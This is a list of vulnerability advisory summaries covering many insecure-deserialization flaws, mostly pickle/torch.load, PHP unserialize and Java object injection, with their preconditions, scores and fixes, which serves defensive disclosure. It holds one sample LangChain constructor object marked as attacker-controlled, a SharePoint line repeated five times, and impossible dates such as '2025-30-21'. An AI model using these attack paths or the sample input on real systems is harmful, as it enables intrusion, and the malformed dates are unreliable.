Deserialization

Security restriction bypass in logback-core's HardenedObjectInputStream allows limited object injection via logback's SimpleSocketServer and SimpleSSLSocketServer components, affecting all versions through 1.5.32 inclusive. An attacker who can influence serialized data submitted to these socket server endpoints can instantiate objects from java.lang and java.util classes not explicitly blocked by the hardened deserializer, circumventing its intended allowlist controls. The vendor and NVD both confirm no practical remote code execution or significant privilege escalation has been identified; the real-world impact is limited confidentiality and integrity exposure. No public exploit identified at time of analysis beyond E:P proof-of-concept maturity indicated in the CVSS vector. Not listed in CISA KEV.

Arbitrary file deletion in the WP Contact Form 7 DB Handler WordPress plugin (versions up to and including 3.0) can be achieved by chaining CSRF, UNION-based SQL injection, and PHP object deserialization. A remote unauthenticated attacker who lures a logged-in administrator to a malicious page can delete arbitrary server files, including wp-config.php, which typically forces the site into a re-installation state and enables full site takeover. No public exploit identified at time of analysis, though Wordfence's detailed write-up effectively documents the exploit chain.

Unauthenticated PHP object deserialization affects Symfony's Monolog Bridge through the development-time `server:log` console command, which by default binds a TCP listener to 0.0.0.0:9911 and runs `unserialize(base64_decode())` on every received frame with no class allowlist, authentication, or integrity check. Any host that can reach port 9911 on a machine running `server:log` can submit attacker-controlled serialized payloads, producing at minimum an unauthenticated denial of service (a non-array value triggers a fatal type error) and potentially object injection or full remote code execution where usable gadget chains exist in the target's autoloaded classes. Affected versions are symfony/symfony and symfony/monolog-bridge below 5.4.52, 6.x below 6.4.40, and 7.x below 7.4.12; there is no public exploit identified at time of analysis and no CVSS, EPSS, or CISA KEV data is available.

Remote code execution in RELATE LMS (the inducer/relate web courseware platform) stems from its Celery task queue being configured to accept and unpickle untrusted messages (CELERY_ACCEPT_CONTENT included "pickle"). Because the code-execution sandbox lacks network isolation, an authenticated student can reach the message broker and deliver a malicious pickle payload that the worker deserializes, yielding arbitrary command execution on the host. No public exploit identified at time of analysis; the issue is corrected in commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb.

PHP object injection in Pimcore (packages pimcore/pimcore and admin-ui-classic-bundle) up to and including version 12.3.6 arises from six code paths calling unserialize() without the allowed_classes restriction on values read from database columns and filesystem files. An attacker who can already write to one of those sources - for example through SQL injection into the tmp_store, sites, or custom_layouts tables, or a file write to the WebDAV delete log - can plant a serialized PHP gadget chain that executes arbitrary code with web-server privileges once the data is deserialized. No public exploit identified at time of analysis (the vendor advisory documents only a conceptual PoC procedure), the CVE is not in CISA KEV, and EPSS is not provided; the issue is fixed in 12.3.7 and rated CVSS 8.0, with the High attack-complexity reflecting its dependence on a separate write primitive and a working gadget chain.

Unsafe deserialization in Jenkins Active Directory Plugin 2.41 and earlier allows a remote attacker holding administrative credentials to achieve full system compromise by manipulating the LDAP referral processing path. The plugin deserializes data received from LDAP referrals without validation (CWE-502), which can enable arbitrary code execution on the Jenkins controller. No public exploit exists at time of analysis, and CISA SSVC assesses this as not automatable, though technical impact is rated total - making it a targeted rather than opportunistic threat.

Jenkins LDAP Plugin versions up to and including 807.v7d7de30930cf deserializes Java objects returned via LDAP referral responses without any validation, exposing the underlying Jenkins instance to potential remote code execution via classic Java deserialization gadget chains. Exploitation is constrained by a high privilege requirement and high attack complexity (CVSS PR:H/AC:H), limiting realistic scenarios to attackers who already hold Jenkins administrative credentials or can manipulate LDAP referral destinations. No public exploit code has been identified and this vulnerability does not appear in the CISA KEV catalog at time of analysis.

SQL injection in Pimcore's admin-ui-classic-bundle (versions <= 2.3.5) allows an authenticated user holding only the translations-view permission to read arbitrary database contents by injecting into the translation grid's date filter. The user-controlled 'property' field of the filter JSON is interpolated directly into a UNIX_TIMESTAMP(DATE(FROM_UNIXTIME(...))) expression at the POST /admin/translation/translations endpoint, behind only a trivially bypassable str_replace('--','') filter. A working proof-of-concept and publicly available exploit code exist; the reporter notes it can be chained with an unsafe-unserialize flaw (GM-249) to reach remote code execution. No EPSS score or CISA KEV listing was supplied.

Unsafe deserialization in Microsoft Planetary Computer Pro (Geocatalog) lets a remote unauthenticated attacker craft malicious serialized payloads that the service processes, resulting in information disclosure across a trust boundary. The maximum CVSS 10.0 score reflects network-reachable exploitation with no privileges or user interaction and a scope change, though no public exploit identified at time of analysis and EPSS data was not provided.

Authenticated remote code execution in Microsoft SharePoint (Enterprise Server 2016, Server 2019, and Subscription Edition) stems from unsafe deserialization of untrusted data (CWE-502), enabling an authorized attacker to run arbitrary code on the server over the network. CVSS 8.8 with low privileges required and no user interaction makes this attractive to post-authentication adversaries, though no public exploit identified at time of analysis and CVSS temporal data marks exploit code maturity as Unproven.

Arbitrary code execution in Amazon Braket Python SDK versions prior to 1.117.0 allows an authenticated attacker with S3 write access to the job output bucket to compromise any client machine that processes those job results. The flaw stems from insecure pickle deserialization in the job results processing component, and while no public exploit has been identified at time of analysis, the impact extends to every downstream consumer of poisoned results. EPSS data is unavailable, but the supply-chain-style propagation across analyst workstations and CI systems materially raises real-world risk.

Constraint extension stripping in the golang.org/x/crypto SSH agent client (versions prior to 0.52.0) allows remote SSH hosts to use forwarded keys without the destination restrictions the user intended. When clients added keys to a remote agent, extensions such as restrict-destination-v00@openssh.com were silently dropped during serialization, effectively converting scoped keys into unrestricted ones on downstream hosts. No public exploit identified at time of analysis and EPSS is very low (0.02%), but SSVC rates technical impact as total and automatable.

Remote code execution in Concrete CMS versions 5.0 through 9.5.0 allows a high-privileged administrator to bypass the platform's `_fromCIF` deserialization guard by submitting malicious payloads through the REST API instead of standard form POST requests. The flaw resides in the ExpressEntryList block controller (CWE-502) and stores a serialized PHP gadget in the `filterFields` database column, which is unmarshalled when another administrator subsequently views or edits the block, leading to full server takeover. No public exploit identified at time of analysis, and the issue is not present in CISA KEV.

Deserialization of untrusted data in Apache Fory PyFory. PyFory's ReduceSerializer could bypass documented DeserializationPolicy validation hooks during reduce-state restoration and global-name resolution. An application is vulnerable if it deserializes attacker-controlled data using PyFory Python-native mode with strict mode disabled and relies on DeserializationPolicy to restrict unsafe classes, functions, or module attributes. This issue affects Apache Fory: from before 1.0.0. Mitigation: Users of Apache Fory are recommended to upgrade to version 1.0.0 or later, which enforces DeserializationPolicy validation for the affected ReduceSerializer paths and thus fixes this issue.

Arbitrary code execution in NVIDIA BioNemo Framework on Linux allows a local attacker to abuse unsafe deserialization of untrusted data (CWE-502), leading to code execution, denial of service, information disclosure, and data tampering. The CVSS 7.8 vector indicates local attack vector with required user interaction, and no public exploit has been identified at time of analysis.

Unsafe deserialization in NVIDIA TensorRT-LLM's RPC testing component allows a local high-privileged attacker to trigger code execution, denial of service, data tampering, or information disclosure across a changed scope. The flaw is rated CVSS 7.5 despite local-only access and high attack complexity because successful exploitation crosses a security boundary (S:C) and yields full CIA impact. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

Deserialization of untrusted data in NVIDIA TensorRT-LLM across all platforms allows a local, low-privileged attacker to achieve code execution, data tampering, and information disclosure by exploiting an unsafe serialized handle. The CVSS Changed Scope (S:C) indicates the impact can extend beyond the vulnerable component itself - notable given TensorRT-LLM's role as an inference serving library often integrated into multi-tenant or production AI infrastructure. No public exploit identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog.

Unsafe deserialization in NVIDIA TensorRT-LLM's MPI server component allows a high-privileged local attacker to achieve code execution, denial of service, data tampering, or information disclosure on systems running the affected library. The CVSS 7.5 score reflects high impact but constrained exploitability (AV:L/AC:H/PR:H), and no public exploit identified at time of analysis. Scope change (S:C) indicates compromise can extend beyond the vulnerable component to impact other resources on the host.

PHP Object Injection in the Boost plugin for WordPress (versions up to and including 2.0.3) allows unauthenticated remote attackers to inject arbitrary PHP objects via the STYXKEY-BOOST_USER_LOCATION cookie. The vulnerability stems from unsafe deserialization of attacker-controlled cookie data; while the plugin itself ships no usable POP (property-oriented programming) chain, exploitation becomes high-impact when any other installed plugin or theme provides one. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

Java Deserialisation Vulnerability in Jaspersoft Reports Library leads to Remote Code Execution (RCE), potentially allowing code execution on the affected system

Unauthenticated root-level remote code execution affects HestiaCP versions 1.9.0 through 1.9.4 when the optional web terminal feature is enabled, stemming from a session-handling format mismatch (CWE-502) between the PHP backend and the Node.js web terminal. Remote attackers can inject crafted HTTP header data that PHP writes into session storage but Node.js parses with naive string splitting, yielding arbitrary command execution as root; no public exploit identified at time of analysis, though VulnCheck has published a technical advisory and the upstream patch is publicly diffable.

Remote code execution in the TYPO3 'Content Element Selector' extension allows unauthenticated attackers to execute arbitrary PHP code by sending a crafted cookie that the extension feeds directly into PHP's unserialize(). The flaw (CWE-502, CVSS 4.0 score 9.2) is exploitable only on installations where a content element is configured with 'Persistent Mode: Static'. No public exploit identified at time of analysis, though the deserialization pattern is well-understood and typically rapid to weaponize.

Remote code execution in the TYPO3 Crawler extension occurs when the X-T3Crawler-Meta response header from a crawled URL is passed unchecked to PHP's unserialize(), enabling arbitrary PHP object injection. Exploitation requires a high-privileged administrator to configure a crawler-enabled page and a Scheduler task pointing at an attacker-controlled endpoint, so while impact is full RCE on the TYPO3 host, it is gated by an unusual combination of admin access, user interaction, and externally reachable malicious URLs. No public exploit identified at time of analysis and no CISA KEV listing.

Insecure deserialization in Significant-Gravitas AutoGPT platform versions 0.6.34 through 0.6.51 lets an attacker who can poison entries in the shared Redis cache achieve arbitrary command execution inside the backend container. The backend's read path invokes pickle.loads on cache bytes with no HMAC, signature, or schema gate, so any attacker-controlled value reaching that key becomes code on retrieval. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV; the vendor shipped a fix in autogpt-platform-beta-v0.6.52.

Remote code execution in APScheduler (all versions through 3.10.x and 4.0.0a5) is achievable when applications deserialize attacker-controlled data via the bundled JSONSerializer or CBORSerializer. The unmarshal_object routine dynamically imports modules and invokes __setstate__ on arbitrary classes, letting an attacker pivot an untrusted payload into code execution; publicly available exploit code exists, though EPSS remains low at 0.06% (19th percentile).

Remote code execution in FreePBX versions below 16.0.71 and 17.0.6 allows authenticated low-privileged users with backup access to execute arbitrary PHP code by uploading a malicious tar archive containing a crafted manifest file. The backup module passes attacker-controlled data directly to PHP's unserialize() without class restrictions, enabling PHP object injection that runs as the asterisk or www-data web server user. No public exploit identified at time of analysis, though the upstream fix commits are public on GitHub, making patch-diff exploitation feasible.

SGLangs multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() will be deserialized without validation.

SGLangs multimodal generation runtime scheduler's ROUTER socket binds to 0.0.0.0 by default and contains a sink that calls pickle.loads() on incoming messages, enabling RCE when exposed to the internet.

Deserialization vulnerability in H2O-3 machine learning platform versions up to 7402 enables remote code execution through the importBinaryModel function when processing malicious JAR files. The vulnerability allows unauthenticated remote attackers to execute arbitrary code with publicly available exploit code (CVSS 7.3, EPSS not provided). The vendor failed to respond to disclosure attempts, leaving users without an official patch.

Unsafe deserialization in Oinone Pamirs versions up to 7.2.0 allows authenticated remote attackers to potentially execute arbitrary code via crafted JSON payloads to the appConfigQuery interface. The vulnerability exists in JsonUtils.parseMap within PamirsParserConfig.java, where attacker-controlled data is deserialized without proper validation. Public exploit code is available on GitHub, though EPSS and KEV data are not provided. CVSS 4.0 score of 2.1 reflects limited scope impact (VC:L/VI:L/VA:L with SC:N/SI:N/SA:N), requiring low-privilege authentication (PR:L) but featuring low attack complexity (AC:L) and network attack vector (AV:N). Vendor non-responsive to disclosure.

Path traversal in SimpleSAMLphp's CAS server module allows unauthenticated remote attackers to read and deserialize arbitrary files outside the ticket directory via crafted ticket parameters. When using FileSystemTicketStore, attackers can inject '../' sequences into CAS validation endpoints to escape the configured directory, potentially deleting files that contain serialized PHP data compatible with array types. The vulnerability has a CVSS score of 8.6 with no public exploits identified at time of analysis.

DataHub frontend versions prior to 1.5.0.3 deserialize untrusted Java objects from the REDIRECT_URL HTTP cookie during OIDC callback flow without integrity protection, allowing authenticated attackers to read sensitive information. The vulnerability affects the GET /callback/oidc endpoint and requires a valid OIDC identity provider account to exploit. A vendor-released patch is available in version 1.5.0.3.

Unsafe deserialization in LangSmith SDK's prompt pull methods allows remote attackers to execute server-side request forgery (SSRF) and redirect LLM traffic to attacker-controlled infrastructure when applications pull public prompts from LangSmith Hub. The SDK deserializes untrusted prompt manifests containing serialized LangChain objects with attacker-controlled constructor arguments, including malicious base_url configurations, custom headers, and secret references. Exploitation requires user interaction (developers must call pull_prompt with a malicious owner/name identifier), but no authentication is required to publish malicious prompts to the public Hub. Vendor-released patches in Python >= 0.8.0 and JS/TS >= 0.6.0 now block public prompt pulling by default, requiring explicit opt-in via dangerously_pull_public_prompt flag. EPSS data not available; no CISA KEV listing or public exploit identified at time of analysis.

Remote code execution in F5 BIG-IP and BIG-IQ Configuration utility allows authenticated attackers with low privileges to execute arbitrary code with high impact to confidentiality, integrity, and availability. The vulnerability stems from unsafe deserialization (CWE-502) in the management interface, exploitable over the network with low attack complexity and no user interaction required. Vendor-released patch available per F5 advisory K000156761. No public exploit identified at time of analysis, with CVSS 8.8 indicating critical severity for environments where attackers have valid low-privilege credentials to the Configuration utility.

PHP Object Injection vulnerability in coreActivity activity logging plugin through version 3.0 allows remote attackers to trigger persistent Denial of Service blocking administrator access to log pages. Unauthenticated attackers inject crafted PHP serialized payloads via User-Agent headers during any logged event (e.g., failed login). When administrators view the Logs page, the plugin deserializes untrusted data and passes it to DeviceDetector::setUserAgent(), causing Fatal TypeError. Vendor-released patch version 3.1 available (released May 6, 2026). EPSS exploitation probability not available; no CISA KEV listing at time of analysis. CVSS 8.1 reflects high complexity attack requiring precise payload crafting despite no authentication requirement.

Adobe Connect versions 2025.9.15, 2025.8.157 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Remote code execution in Ludwig framework ≤0.10.4 allows unauthenticated network attackers to execute arbitrary code by supplying a malicious PyTorch model file to the ludwig serve endpoint. The vulnerability stems from unsafe deserialization in the model loading component, which uses torch.load() without the weights_only=True safety parameter. With CVSS 9.8 (critical network vector, no authentication required) but only 0.02% EPSS, this represents a high-severity issue in vulnerable deployments, though widespread exploitation has not been observed. No CISA KEV listing or public POC identified at time of analysis.

Arbitrary code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load malicious model checkpoint files through the Trainer.load() method. The vulnerability stems from unsafe PyTorch deserialization that processes untrusted Pickle objects without the weights_only security parameter. Attackers can embed malicious Python code in model files distributed through repositories, shared datasets, or social engineering campaigns. Despite the 8.8 CVSS score indicating critical severity, EPSS scoring at 0.06% (19th percentile) suggests very low real-world exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis.

Remote code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load untrusted model files via MultitaskClassifier.load(). The vulnerability exploits insecure Python object deserialization through torch.load(), allowing attackers to embed malicious code in model weight files that executes upon loading. EPSS score of 0.06% (19th percentile) suggests low observed exploitation probability in the wild, though SSVC framework indicates total technical impact once exploited. No public exploit code or active exploitation confirmed at time of analysis, but exploitation requires only that a data scientist or ML engineer load a malicious .pkl model file.

Remote code execution in Horovod distributed training framework (versions through 0.28.1) allows unauthenticated network attackers to execute arbitrary code on worker nodes by injecting malicious pickle payloads into the KVStore HTTP server. The vulnerability combines unauthenticated write access to the KVStore coordination server with unsafe deserialization using cloudpickle.loads(), enabling trivial exploitation against any reachable Horovod cluster. EPSS score of 0.12% (31st percentile) suggests low widespread exploitation probability despite critical CVSS 9.8 rating, and no active exploitation confirmed (not in CISA KEV). Public exploit development is highly feasible given the straightforward attack path and publicly documented details.

Insecure deserialization in Optimate's neural_magic_training.py script enables remote code execution when loading PyTorch model files. The _load_model() function uses torch.load() without the weights_only=True security parameter, allowing attackers with low privileges to execute arbitrary Python code by providing malicious .pt or .pth files via the --model command-line argument. EPSS indicates low exploitation probability at 0.06% with no active exploitation confirmed.

Remote code execution in Optimate's neural_magic_training.py script allows authenticated attackers to execute arbitrary code via malicious PyTorch model files. The vulnerability stems from unsafe deserialization when loading model state dictionaries without PyTorch's weights_only=True security flag, enabling pickle-based arbitrary object execution. With an EPSS score of 0.06% and no confirmed exploitation, this represents a moderate risk primarily in environments where users can upload or specify model files.

Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.

Remote code execution in Mamba language model framework (through version 2.2.6) allows unauthenticated attackers to execute arbitrary Python code by publishing malicious models on HuggingFace Hub. When victims call MambaLMHeadModel.from_pretrained() on a weaponized model repository, insecure pickle deserialization executes attacker-controlled code in the context of the victim's process. Despite the critical CVSS 9.8 score and network attack vector requiring no authentication, EPSS probability remains extremely low (0.02%, 5th percentile), suggesting limited real-world exploitation to date. No CISA KEV listing or public POC identified at time of analysis.

Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.

Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.

Arbitrary code execution occurs in PyTorch Lightning 2.6.0 and earlier when loading malicious checkpoint files. The LightningModule.load_from_checkpoint() method deserializes untrusted Pickle data without security restrictions, allowing attackers to execute arbitrary Python code when victims open crafted .ckpt files. EPSS score of 0.06% (19th percentile) indicates low observed exploitation probability, and no public exploit code or CISA KEV listing exists at time of analysis. Attack requires local access and user interaction (opening a malicious checkpoint), limiting remote attack scenarios to social engineering or supply chain compromise.

Arbitrary code execution in imgaug library (versions through 0.4.0) occurs when the BackgroundAugmenter class deserializes malicious pickle payloads without validation in its multiprocessing worker method. Attackers who can influence queue data-through compromised shared queues, malicious input scripts, or social engineering-can achieve remote or local code execution depending on deployment context. CVSS 9.8 critical severity reflects network-based exploitation without authentication, though EPSS probability is low (0.02%, 6th percentile), indicating limited observed exploitation activity. No CISA KEV listing or public exploit code identified at time of analysis.

The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.

Arbitrary code execution in Snorkel library (Python) through version 0.10.0 enables remote attackers to execute code by supplying malicious pickle files to the BaseLabeler.load() method. The vulnerability stems from unsafe deserialization using pickle.load() without input validation, allowing attackers to craft serialized objects that execute arbitrary commands during deserialization. With EPSS at 6th percentile, exploitation probability remains relatively low despite the critical CVSS score, and no active exploitation (KEV) or public proof-of-concept has been identified at time of analysis.

An authenticated administrator who configures or tests LDAP connectivity in Sonatype Nexus Repository Manager versions 3.0.0 through 3.91.1 may be able to initiate unintended server-side connections when interacting with a malicious LDAP server.

Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its make_parquet_list.py data processing tool. The script loads PyTorch .pt files (utterance embeddings, speaker embeddings, speech tokens) using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious .pt files within a data directory. When a victim processes this directory using the tool, arbitrary code is executed on the victim's system.

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its gRPC server component. When the server starts, it loads the speech synthesis model from a user-specified directory using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious model files within a directory. When a victim starts the gRPC server pointing to this directory, arbitrary code is executed on the victim's system during server initialization.

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its average_model.py model averaging tool. The script loads PyTorch checkpoint files (epoch_*.pt) for model averaging using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious checkpoint files within a directory. When a victim uses the tool to average models from this directory, arbitrary code is executed on the victim's system.

The flash-attention training framework thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains an insecure deserialization vulnerability (CWE-502) in its checkpoint loading mechanism. The load_checkpoint() function in checkpoint.py and the checkpoint loading code in eval.py use torch.load() without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a maliciously crafted checkpoint file. When a victim loads this checkpoint during model warmstarting or evaluation, arbitrary code is executed on the victim's system.

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework uses torch.load() to load model weight files (e.g., llm.pt, flow.pt, hift.pt) without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a malicious model directory containing specially crafted model files. When a victim starts the CosyVoice Web UI pointing to this directory, arbitrary code is executed on the victim's system during the model loading process.

{ "lc": 1, "type": "constructor", "id": ["langchain_core", "messages", "ai", "AIMessage"], "kwargs": {"content": "attacker-controlled content"} }

Remote code execution in SEPPmail Secure Email Gateway via insecure deserialization allows unauthenticated attackers to execute arbitrary code through the GINA UI interface. Versions prior to 15.0.4 deserialize untrusted data without validation, enabling attackers to send crafted serialized objects that execute upon processing. CVSS 9.2 reflects network-accessible attack with low complexity requiring only present attack conditions, though no active exploitation (KEV) or public POC has been identified at time of analysis.

PHP object injection in User Frontend plugin for WordPress versions up to 4.3.1 allows authenticated attackers with Subscriber-level access or above to achieve remote code execution via unsafe deserialization of the wpuf_files parameter during form submission. The vulnerability chains input validation failures during form processing with unconditional use of maybe_unserialize() when rendering post content, enabling attackers to inject malicious PHP objects that can execute arbitrary code, delete files, or trigger other attacks through available Property-Oriented Programming (POP) chains. Wordfence disclosed detailed code references showing the vulnerable data flow across multiple plugin files including wpuf-functions.php, FieldableTrait.php, and Frontend_Form_Ajax.php, with both trunk and version 4.2.10 code paths exhibiting the flaw.

Netgate pfSense CE 2.7.2 allows code execution by using the module installer with a backup file with a serialized PHP object containing the post_reboot_commands property. NOTE: the Supplier disputes this because this installer is only available to admins and they are intentionally allowed to execute PHP code.

Allocation amplification in Zebra network deserializers allows unauthenticated remote peers to force excessive memory preallocation and parsing overhead across multiple message types (headers, blocks, transactions) by exploiting the use of generic transport/block-size ceilings instead of protocol-specific limits. An attacker can trigger 8.8x oversized header allocations, unbounded equihash solution parsing, and inflated Sapling spend vector allocations on inbound peer messages, causing denial of service through cumulative per-connection and multi-peer fan-in effects. CVSS 5.3 (AV:N/AC:L/PR:N/UI:N) indicates network-accessible, unauthenticated exploitation of default configurations; no public exploit identified at time of analysis, but vendor-released patch available in Zebra 4.4.0.

Nerdbank.MessagePack contains an uncontrolled stack allocation vulnerability in DateTime decoding. A malicious MessagePack payload can declare an oversized timestamp extension length, causing the reader to allocate an attacker-controlled number of bytes on the stack. This can trigger a `StackOverflowException`, which is not catchable by user code and terminates the process. Applications are impacted if they deserialize MessagePack data from untrusted or attacker-controlled sources using Nerdbank.MessagePack and the target type contains a `DateTime` value. A small malicious payload can cause process termination, resulting in a denial of service. This may affect services, APIs, workers, message consumers, or other long-running processes that deserialize untrusted MessagePack input. The issue occurs because DateTime timestamp extension decoding derives `tokenSize` from the attacker-controlled extension length before validating that the timestamp length is one of the legal MessagePack timestamp sizes: 4, 8, or 12 bytes. When the buffer is incomplete, that unvalidated size is propagated to the streaming reader slow path, where it is used in a `stackalloc`. The 1.1.62 version contains the fix for this security vulnerability. If upgrading is not yet possible, avoid deserializing untrusted MessagePack payloads into type graphs that may contain `DateTime` fields or properties. Input byte-size limits alone may not fully mitigate this issue, because the malicious payload can be small while declaring a very large extension length. Possible mitigations include: - Pre-validating MessagePack extension headers before deserialization and rejecting timestamp extensions whose length is not 4, 8, or 12 bytes. - Rejecting or filtering extension type `-1` timestamp values from untrusted input unless they are known to be valid. - Running deserialization of untrusted payloads in an isolated process that can be safely restarted after termination. - Restricting MessagePack deserialization to trusted producers until a patched version is available. - CWE-789: Uncontrolled Memory Allocation: https://cwe.mitre.org/data/definitions/789.html - MessagePack timestamp extension specification: https://github.com/msgpack/msgpack/blob/master/spec.md#timestamp-extension-type

Remote denial of service in Apache OpenNLP versions before 2.5.9 and 3.0.0-M3 allows unauthenticated attackers to crash JVM processes by uploading malicious .bin model files that trigger OutOfMemoryError through unbounded array allocation. Exploitation requires no authentication (AV:N/AC:L/PR:N) and affects any code path deserializing binary model files from untrusted sources. EPSS score of 0.02% (5th percentile) suggests low widespread exploitation risk, and no active exploitation or public POC has been identified at time of analysis. Vendor-released patches are available with default safeguards limiting count fields to 10 million entries.

Unsafe deserialization in MindsDB pickle.loads function allows authenticated remote attackers to achieve limited information disclosure and integrity compromise via crafted serialized objects. The vulnerability affects MindsDB up to version 26.01, requires valid credentials (PR:L), and has publicly available exploit code; however, the low CVSS score (2.1) and limited scope indicate restricted real-world impact despite network accessibility.

Unsafe deserialization in SGLang's HuggingFace Transformer Handler allows remote attackers to trigger deserialization attacks via the get_tokenizer function in versions up to 0.5.9, potentially leading to code execution or information disclosure. The vulnerability requires high attack complexity and has not been patched despite early vendor notification.

Unauthenticated PHP object injection in Profile Builder Pro for WordPress allows remote attackers to execute arbitrary code by deserializing malicious objects through an unprotected AJAX endpoint. The vulnerability affects all versions through 3.14.5 and stems from unsafe deserialization of attacker-controlled POST data in the wppb_request_users_pins_action_callback() handler, which was registered for both authenticated and unauthenticated users without nonce verification. With CVSS 8.1 and AC:H complexity, exploitation requires chaining with a POP gadget chain, though EPSS data and KEV status are not available to confirm active exploitation.

Unsafe pickle deserialization in mem0 up to version 1.0.11 allows authenticated remote attackers to execute arbitrary code via manipulation of the faiss.py vector store module. The vulnerability affects the pickle.load/pickle.dump functions used to serialize docstore data, enabling code execution with moderate impact (confidentiality, integrity, availability). Public exploit code is available, and vendor has released a patched version.

Remote code execution in Apache MINA 2.1.0-2.1.11 and 2.2.0-2.2.6 allows unauthenticated attackers to execute arbitrary code via unsafe deserialization. The fix for prior CVE-2024-52046 was incomplete-the classname allowlist protecting IoBuffer.getObject() was applied too late, allowing malicious static initializers to execute before filtering. Confirmed actively exploited (CISA KEV). EPSS exploitation probability not provided, but the network-accessible, unauthenticated attack vector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N) combined with KEV status indicates immediate patching is critical for applications calling IoBuffer.getObject().

Remote unauthenticated code execution in Apache MINA 2.1.0-2.1.11 and 2.2.0-2.2.6 allows attackers to bypass class allowlist protections via unsafe deserialization. The vulnerability exists because the fix for CVE-2026-41635 was not backported to the 2.1.X and 2.2.X branches, leaving AbstractIoBuffer.resolveClass() susceptible to arbitrary class instantiation when applications call IoBuffer.getObject(). Only applications actively using MINA's deserialization features are affected. EPSS data not available; no KEV listing or public POC identified at time of analysis.

Unsafe deserialization in Zurich Instruments LabOne Q enables arbitrary code execution when users load malicious experiment files. The import_cls mechanism accepts unvalidated class names from serialized data, allowing attackers to instantiate arbitrary Python classes with controlled constructor arguments. Exploitation requires user interaction to open a crafted file, making this a credible vector for supply chain attacks via shared experiment configurations or support tickets. CVSS 8.4 reflects local attack vector with user interaction requirement. No confirmed active exploitation or public POC at time of analysis.

